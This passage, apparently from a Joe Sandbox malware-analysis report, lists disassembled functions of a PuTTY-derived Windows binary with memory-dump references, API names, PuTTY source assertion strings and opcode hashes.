                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: IconicShowWindow
                    • String ID:
                    • API String ID: 3061500023-0
                    • Opcode ID: 29db090a15a727dc06a489d8120910b302313e16a4190764d5ab56894211c842
                    • Instruction ID: 0fe4e4cfcde00704b5b135d1a4c185285b8d854a7d936bd0dcff0bb42c159a5f
                    • Opcode Fuzzy Hash: 29db090a15a727dc06a489d8120910b302313e16a4190764d5ab56894211c842
                    • Instruction Fuzzy Hash: 8BD09EF02451009BEB112B24BE547BE7BDDEB16741F1844A0F9C6C35B1EF768810E619
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C28100 Relevance: 2.7, Strings: 2, Instructions: 210COMMON
                    Download Yara Rule
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/ssh/crc-attack-detector.c, xrefs: 00C28120, 00C282F9
                    • !(len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) || len % SSH_BLOCKSIZE != 0), xrefs: 00C28125
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: !(len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) || len % SSH_BLOCKSIZE != 0)$/home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/ssh/crc-attack-detector.c
                    • API String ID: 0-3667554043
                    • Opcode ID: e8c19ab2448110f98fcd3ae1a63b8ca7fc0b94aa30379c0840c8e53b7f950fbf
                    • Instruction ID: c534e94b8699e5bada6f2adf7e46fe1b258792cf60e6f83a7e2ddb93cac48b4c
                    • Opcode Fuzzy Hash: e8c19ab2448110f98fcd3ae1a63b8ca7fc0b94aa30379c0840c8e53b7f950fbf
                    • Instruction Fuzzy Hash: 7C51E1716057119BCB24CF14E891A2AB3E1FF98704F15452CE89A97B91EF70FE19CB81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C2C9F0 Relevance: 2.6, Strings: 2, Instructions: 117COMMON
                    Download Yara Rule
                    Strings
                    • h->hlen <= MAX_HASH_LEN, xrefs: 00C2CA90
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/crypto/rsa.c, xrefs: 00C2CA8B
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/crypto/rsa.c$h->hlen <= MAX_HASH_LEN
                    • API String ID: 0-284240353
                    • Opcode ID: 89178ed16e3c0e246359fff194c19ec3a667f32a05fba68a5d3ee567a0b57344
                    • Instruction ID: d7050c3bafd94b6b5a89d28e1c8f6f9f6953112c74e2ed85bdd0703c06d47827
                    • Opcode Fuzzy Hash: 89178ed16e3c0e246359fff194c19ec3a667f32a05fba68a5d3ee567a0b57344
                    • Instruction Fuzzy Hash: EE4108709083589BCB25EF24E88562FBBE0AF85314F08856DE4DA4B243D731E514DB93
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C32730 Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                    Download Yara Rule
                    Strings
                    • ek->curve->type == EC_EDWARDS, xrefs: 00C3274D
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/crypto/ecc-ssh.c, xrefs: 00C32748
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/crypto/ecc-ssh.c$ek->curve->type == EC_EDWARDS
                    • API String ID: 0-3084317420
                    • Opcode ID: a3538c390a3fdce121e5149f40ccb4aa2e8b78b181835c5c01778eaaa9e0bd17
                    • Instruction ID: 3276ae405dcca2d529293e970fcf2aa529b47563ef2371dc864ec55f16e02468
                    • Opcode Fuzzy Hash: a3538c390a3fdce121e5149f40ccb4aa2e8b78b181835c5c01778eaaa9e0bd17
                    • Instruction Fuzzy Hash: 2231C1B6C04201AFCB10AF51EC82C2AF7E4FF55319F094568F95857362E731AE24DB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C18B40 Relevance: 2.5, Strings: 2, Instructions: 43COMMON
                    Download Yara Rule
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/crypto/mpint.c, xrefs: 00C18B5B
                    • x0->nw == x1->nw, xrefs: 00C18B60
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/crypto/mpint.c$x0->nw == x1->nw
                    • API String ID: 0-3824505450
                    • Opcode ID: 0a882044438aac3e2726d6ca7c25c9f66bbabf22ffeae728ba0fbc13b961fbe7
                    • Instruction ID: 4b3fb85815d411bc1a9d616f0c315d3f91eb5ba65edde99729219cb503e84262
                    • Opcode Fuzzy Hash: 0a882044438aac3e2726d6ca7c25c9f66bbabf22ffeae728ba0fbc13b961fbe7
                    • Instruction Fuzzy Hash: 020162B5A042029FC724CF18D881E67F7F1FF9A310F284528D45597301C331F895CA95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C347D0 Relevance: 2.2, APIs: 1, Instructions: 654COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: __aulldiv
                    • String ID:
                    • API String ID: 3732870572-0
                    • Opcode ID: 277cbd6a59f8baa4579d44b711721f44710fb65b6825581f9bba46b39bb88784
                    • Instruction ID: bc87d41860479ee9d88c9291306cfcc891d3ab5d736292cffed53694f0401310
                    • Opcode Fuzzy Hash: 277cbd6a59f8baa4579d44b711721f44710fb65b6825581f9bba46b39bb88784
                    • Instruction Fuzzy Hash: 9422E2329183119BD714CF29C84262BB7E1FFD4704F168A2DF998973A1E734E954CB82
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C4AD00 Relevance: 2.0, Strings: 1, Instructions: 713COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: gj
                    • API String ID: 0-4203073231
                    • Opcode ID: e8b5531b7016f396bd2ad4f8a3cd3829d095cba26c26ff5f70b91c0b749dc6c0
                    • Instruction ID: fe746c293ac68b1537045e96be57369c52289ee8b7a761a3d5b5de6d942410a1
                    • Opcode Fuzzy Hash: e8b5531b7016f396bd2ad4f8a3cd3829d095cba26c26ff5f70b91c0b749dc6c0
                    • Instruction Fuzzy Hash: 7272BEB1A093408FC358CF29C490A5AFBE2BFC8314F59892EE5D9D7351DB71A8548F86
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BBCFB0 Relevance: 1.9, APIs: 1, Instructions: 437timeCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: BlinkCaretTime
                    • String ID:
                    • API String ID: 1096504186-0
                    • Opcode ID: aa1f3ad81b47031ae25355f94a431f7f4b0d729b073be7bd0ab33f655a73b76e
                    • Instruction ID: 41a08fffc240b7fd99e5c7098201b6155f251d48f4567c626f235884a0cc8103
                    • Opcode Fuzzy Hash: aa1f3ad81b47031ae25355f94a431f7f4b0d729b073be7bd0ab33f655a73b76e
                    • Instruction Fuzzy Hash: 10F195759483C4ABEB315F24AC42BED3FD19F51344F1840A9FCCC1A293E6B69A94C762
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C36920 Relevance: 1.8, APIs: 1, Instructions: 262COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: __aulldiv
                    • String ID:
                    • API String ID: 3732870572-0
                    • Opcode ID: 9060bd1cd7ee3a83cec344a5970c80aa5505c246910b6096937bce94f63f22d9
                    • Instruction ID: ed78d0c9564d968be024219d6ac5d585e9a8a80072111d5a330a51834cb10979
                    • Opcode Fuzzy Hash: 9060bd1cd7ee3a83cec344a5970c80aa5505c246910b6096937bce94f63f22d9
                    • Instruction Fuzzy Hash: 5F71FF76614311ABC714CF29CC8162AB3E1EF94710F09C53CE896EB3A1E735E916DB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C36690 Relevance: 1.7, APIs: 1, Instructions: 243COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: __aulldiv
                    • String ID:
                    • API String ID: 3732870572-0
                    • Opcode ID: 10fb34c8d10b20af0a2bc3d776003a001105b226bb41dc61b048fea07b105330
                    • Instruction ID: fff61adc29283385102940bd8721de07c27766938f606db09c206cc77b1fb6be
                    • Opcode Fuzzy Hash: 10fb34c8d10b20af0a2bc3d776003a001105b226bb41dc61b048fea07b105330
                    • Instruction Fuzzy Hash: EA610572A143026BC314DE2DCD8271AB7E5EF94710F89D52DF888EB3A1E675E914C782
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C3E290 Relevance: 1.7, Strings: 1, Instructions: 487COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: 7
                    • API String ID: 0-1790921346
                    • Opcode ID: 5d6b7b4cf46ca619f2dafa8658276a86d7c2aca95c07835516d23f083013dcef
                    • Instruction ID: 19006e8ce741daedb65b5aaf778ec21d27d5ad4727df6408a06d76651a997785
                    • Opcode Fuzzy Hash: 5d6b7b4cf46ca619f2dafa8658276a86d7c2aca95c07835516d23f083013dcef
                    • Instruction Fuzzy Hash: 0A024F72A083048BC354DF5ED88065BF7E2BFC8314F5A892DE998C3315DB75E9168A86
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C36460 Relevance: 1.7, APIs: 1, Instructions: 220COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: __aulldiv
                    • String ID:
                    • API String ID: 3732870572-0
                    • Opcode ID: 4a9ac7b2d080601c30d28b40db84344e258bd1fe07b161279d385067addb9081
                    • Instruction ID: 6874f906b316a4b1db76928287d6621e6097451ecff0725b2041f8243b46f081
                    • Opcode Fuzzy Hash: 4a9ac7b2d080601c30d28b40db84344e258bd1fe07b161279d385067addb9081
                    • Instruction Fuzzy Hash: B051ED72628301ABC714DE29CC82A2BB3A2FFC0714F58C83CE455D7295EB35E925C782
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C68F62 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C65BD4: RtlAllocateHeap.NTDLL(00000008,?,?,?,00C631F0,00000001,00000364,?,00000006,000000FF,?,00C5D423,00000003,?,?,00BEAE09), ref: 00C65C15
                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C69103
                    • FindNextFileW.KERNEL32(00000000,?), ref: 00C691F7
                    • FindClose.KERNEL32(00000000), ref: 00C69236
                    • FindClose.KERNEL32(00000000), ref: 00C69269
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Find$CloseFile$AllocateFirstHeapNext
                    • String ID:
                    • API String ID: 4087847297-0
                    • Opcode ID: 69ea7c79c1d068d91eef9963da7d374232d83e7b5a8465a54b3129fd197ce34a
                    • Instruction ID: 4099c10b05a7887d2dbd847cd8b1b7e6e8ba16c8e47acd8e8414bbd855ef2175
                    • Opcode Fuzzy Hash: 69ea7c79c1d068d91eef9963da7d374232d83e7b5a8465a54b3129fd197ce34a
                    • Instruction Fuzzy Hash: 8D516A75904118AFDF349F789CD4ABEB7BEDF89314F244299F429D7241EA308E45AB20
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C1C9F0 Relevance: 1.7, Strings: 1, Instructions: 440COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/crypto/mpint.c
                    • API String ID: 0-3220216471
                    • Opcode ID: 8f01bc4618f077c46cd0eed4498a3e4a63835697425cdeb1c001f281c9c2ece9
                    • Instruction ID: 7a4d57a32dd85786532b0e17d34e8599a8c497100d4861978d35ae59fb13ceda
                    • Opcode Fuzzy Hash: 8f01bc4618f077c46cd0eed4498a3e4a63835697425cdeb1c001f281c9c2ece9
                    • Instruction Fuzzy Hash: 63E1F4B69406109BD720EF14DC82BAAB7A5EF86304F458428FD485B342D731FE45EBE2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C52D27 Relevance: 1.6, Strings: 1, Instructions: 344COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: 0
                    • API String ID: 0-4108050209
                    • Opcode ID: 8918ed50a14c371d188f06af307e39235768315ea9eef06627aec57369baa5ea
                    • Instruction ID: 2893252c887e0e0cf1c8b2b2883f52336904bbf9f1df56709b58bc64090d66ce
                    • Opcode Fuzzy Hash: 8918ed50a14c371d188f06af307e39235768315ea9eef06627aec57369baa5ea
                    • Instruction Fuzzy Hash: 01C1EE385006868FCB28CF68C48567EB7F1EF56302F244619DCA29B291C770AECDDB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C6882E Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C63052: GetLastError.KERNEL32(?,?,00C559E8,?,?,?,?,00C5DBC7,00C5DB94,?,?,?,?,?,00C5DB94,?), ref: 00C63056
                      • Part of subcall function 00C63052: SetLastError.KERNEL32(00000000,00C5DB94,?,?,?,?,?,00C5DB94,?,00000000,?,00000003,00C5149B), ref: 00C630F8
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C68882
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ErrorLast$InfoLocale
                    • String ID:
                    • API String ID: 3736152602-0
                    • Opcode ID: 164166f95b58a1805178d5e06187378855b284b085a2e740a2ed6d8d5179bd63
                    • Instruction ID: 750f1ff4e5950e78e5ff0419bd55ef349fe98726ec43c858f8f93f588b8e8336
                    • Opcode Fuzzy Hash: 164166f95b58a1805178d5e06187378855b284b085a2e740a2ed6d8d5179bd63
                    • Instruction Fuzzy Hash: 0721C531650216ABDB389B15DC81A7B33ACEF48314B10417AF906C7181EF74EE49E760
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C684E1 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C63052: GetLastError.KERNEL32(?,?,00C559E8,?,?,?,?,00C5DBC7,00C5DB94,?,?,?,?,?,00C5DB94,?), ref: 00C63056
                      • Part of subcall function 00C63052: SetLastError.KERNEL32(00000000,00C5DB94,?,?,?,?,?,00C5DB94,?,00000000,?,00000003,00C5149B), ref: 00C630F8
                    • EnumSystemLocalesW.KERNEL32(00C6857C,00000001,00000000,?,-00000050,?,00C6836B,00000000,-00000002,00000000,?,00000055,?), ref: 00C68553
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem
                    • String ID:
                    • API String ID: 2417226690-0
                    • Opcode ID: 9be670b5aa4f5ceb057f8318c0002815c3ce3736b19ffe3021025d04277e6e03
                    • Instruction ID: 105b5df7aa6f0b86f5c9f1b9a76dfb27eacae6fae9611b154583cfcef91c86d9
                    • Opcode Fuzzy Hash: 9be670b5aa4f5ceb057f8318c0002815c3ce3736b19ffe3021025d04277e6e03
                    • Instruction Fuzzy Hash: 101129362003019FEB289F38C8D167AB791FF84358B14453CE99787A40DB71A906CB40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C6894E Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C63052: GetLastError.KERNEL32(?,?,00C559E8,?,?,?,?,00C5DBC7,00C5DB94,?,?,?,?,?,00C5DB94,?), ref: 00C63056
                      • Part of subcall function 00C63052: SetLastError.KERNEL32(00000000,00C5DB94,?,?,?,?,?,00C5DB94,?,00000000,?,00000003,00C5149B), ref: 00C630F8
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C689A2
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ErrorLast$InfoLocale
                    • String ID:
                    • API String ID: 3736152602-0
                    • Opcode ID: 10deab478f462c70b1866fb79905af620dd34dca9495f770a1204a95ab2c7ab6
                    • Instruction ID: 63454868cd93edfec108bf0f876a07225b8fb007d32f2e088c7a9722a27bfba1
                    • Opcode Fuzzy Hash: 10deab478f462c70b1866fb79905af620dd34dca9495f770a1204a95ab2c7ab6
